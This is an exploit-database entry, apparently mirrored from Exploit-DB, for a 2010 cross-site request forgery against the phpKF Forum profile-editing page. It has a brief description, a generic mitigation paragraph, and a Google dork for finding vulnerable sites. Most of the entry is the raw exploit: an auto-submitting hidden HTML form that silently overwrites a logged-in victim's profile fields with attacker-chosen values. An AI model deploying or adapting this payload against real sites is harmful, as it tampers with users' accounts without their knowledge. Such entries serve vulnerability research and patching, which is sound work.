header-logo
Suggest Exploit
vendor:
phpKF Forum
by:
FreWaL
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: phpKF Forum
Affected Version From: 1.80
Affected Version To: All version
Patch Exists: YES
Related CWE: N/A
CPE: a:phpkf:phpkf_forum
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2010

phpKF Forum profil_degistir.php CSRF Exploit.

This exploit allows an attacker to modify the profile of a user on a phpKF Forum without the user's knowledge or consent. The exploit is triggered by sending a malicious POST request to the profil_degistir_yap.php page with the parameters gercek_ad, dogum_tarihi, sehir, web, tema_secim, imza, icq, msn, aim, yahoo, and skype. The attacker can then set the values of these parameters to whatever they want, allowing them to modify the user's profile.

Mitigation:

The best way to mitigate CSRF attacks is to use a combination of both server-side and client-side security measures. On the server-side, developers should use a combination of random tokens, referer checks, and other techniques to verify that the request is legitimate. On the client-side, developers should use a combination of anti-CSRF tokens, same-origin policy checks, and other techniques to verify that the request is legitimate.
Source

Exploit-DB raw data:

# Exploit Title   : phpKF Forum profil_degistir.php CSRF Exploit.
# Google Dork     : php Kolay Forum (phpKF)  ©  2007 - 2010   phpKF Ekibi
# Date            : 05-12-2010
# Author          : FreWaL
# Software Link   : http://www.phpkf.com/dosya.php?no=935
# Version         : 1.80  and  tested on All version
# My Website      : www.imhatimi.org & www.ihtilal.in

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$ 
$        phpKF Forum profil_degistir.php CSRF Exploit.   $            
$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

<frewal>
<form method="POST" action="http://www.w0rms.com/profil_degistir_yap.php">
<br>
<input type="hidden" name="profil_degisti_mi" value="form_dolu">
<br>
<input type="hidden" name="MAX_FILE_SIZE" value="1022999">
<br>
<input type="hidden" name="islem_turu" value="normal">
<br>
<input class="formlar" type="text" name="gercek_ad" size="35" maxlength="30" value="NamesLakap">
<br>
<input class="formlar" type="text" name="dogum_tarihi" size="10" maxlength="10" value="07-02-1985">
<br>
<select class="formlar" name="sehir">
<br>
<option value="Adana">Adana</option>
			<option value="YurtDýþý">Yurt Dýþý</option>
			<option value="Adana">Adana</option>
</select>
<br>
<input class="formlar" type="text" name="web" size="35" maxlength="70" value="http://www.imhatimi.org">
<br>
<td bgcolor="#ffffff" class="liste-veri3" align="left">
<select class="formlar" name="tema_secim"><option value="5renkli">5renkli</option></select>
</td>
<br>
<textarea class="formlar" cols="36" rows="9" name="imza" style="width: 240px; height: 130px">Sinirsiz imza&lt;/textarea&gt;
<br>

	<tr>
	<td height="20" colspan="2" class="forum_baslik" align="center">
ANINDA MESAJLAÞMA ADRESLERÝ
	</td>
	</tr>
<br>
	<tr>
	<td class="liste-veri3" bgcolor="#ffffff" align="left">
ICQ Numaranýz:
	</td>
<br>
	<td bgcolor="#ffffff" class="liste-veri3" align="left">
<input class="formlar" type="text" name="icq" size="35" maxlength="30" value="sanane">
	</td>
	</tr>
<br>
	<tr>
	<td class="liste-veri3" bgcolor="#ffffff" align="left">
AIM Adýnýz:
	</td>
	<td bgcolor="#ffffff" class="liste-veri3" align="left">
<input class="formlar" type="text" name="aim" size="35" maxlength="70" value="banane">
<br>
	</td>
	</tr>

	<tr>
	<td class="liste-veri3" bgcolor="#ffffff" align="left">
MSN Messenger Adýnýz:
	</td>
	<td bgcolor="#ffffff" class="liste-veri3" align="left">
<input class="formlar" type="text" name="msn" size="35" maxlength="70" value="onane">
	</td>
	</tr>
<br>
	<tr>
	<td class="liste-veri3"  bgcolor="#ffffff" align="left">
Yahoo! Messenger Adýnýz:
	</td>
	<td bgcolor="#ffffff" class="liste-veri3" align="left">
<input class="formlar" type="text" name="yahoo" size="35" maxlength="70" value="bizene">
	</td>
	</tr>
<br>
	<tr>

	<td class="liste-veri3" bgcolor="#ffffff" align="left">
Skype Adýnýz:
	</td>
	<td bgcolor="#ffffff"  class="liste-veri3" align="left">
<input class="formlar" type="text" name="skype" size="35" maxlength="70" value="sizene">
	</td>
	</tr>
<br>
<input class="formlar" name="resim_yukle" type="file" size="30" value="">
<br>	
<input class="formlar" type="text" name="uzak_resim" size="35" maxlength="150" value="http://www.resimmax.net/wp-content/uploads/2010/04/Bu-resimde-hem-essek-hem-fok-bal%C4%B1g%C4%B1-gizli-120x120.jpg">	
<br>
Hide Email ? (Email Göster Gizle)
<br>
	<td class="liste-veri3" bgcolor="#ffffff" align="left">
<label style="cursor: pointer;">
<input type=radio name="posta_goster" value="1" >
Evet</label>  
<label style="cursor: pointer;">
<input type="radio" name="posta_goster" value="0" checked="checked">
Hayýr</label>
	</td>
<br>
Doðum tarihi
<br>	
	<td class="liste-veri3" bgcolor="#ffffff" align="left">
<label style="cursor: pointer;">
<input type="radio" name="dogum_tarihi_goster" value="1" checked="checked">
Evet</label>  

<label style="cursor: pointer;">
<input type="radio" name="dogum_tarihi_goster" value="0" >
Hayýr</label>
	</td>
<br>
Sehir Göster Gizle
<br>	
	<td class="liste-veri3" bgcolor="#ffffff" align="left">
<label style="cursor: pointer;">
<input type="radio" name="sehir_goster" value="1" checked="checked">
Evet</label>  

<label style="cursor: pointer;">

<input type="radio" name="sehir_goster" value="0" >
Hayýr</label>
	</td>
	
<br>
Online - Offline Göster Gizle
<br>
	<td class="liste-veri3" bgcolor="#ffffff" align="left">
Çevrimiçi Durumunu Göster: 
	</td>
	<td class="liste-veri3" bgcolor="#ffffff" align="left">
<label style="cursor: pointer;">

<input type="radio" name="gizli" value="0" checked="checked">
Evet</label>  

<label style="cursor: pointer;">
<input type="radio" name="gizli" value="1" >
Hayýr</label>
	</td>
<br>	
<script> document.forms[0].submit() </script>
</form>
</frewal>

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$ 
$         For MecTruy ~ Dr.Ly0n ~ Noxy ~ DeadMaster      $
$              Special Thenx all Security Grup
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Navigation

Suggest Exploit

Services By CQR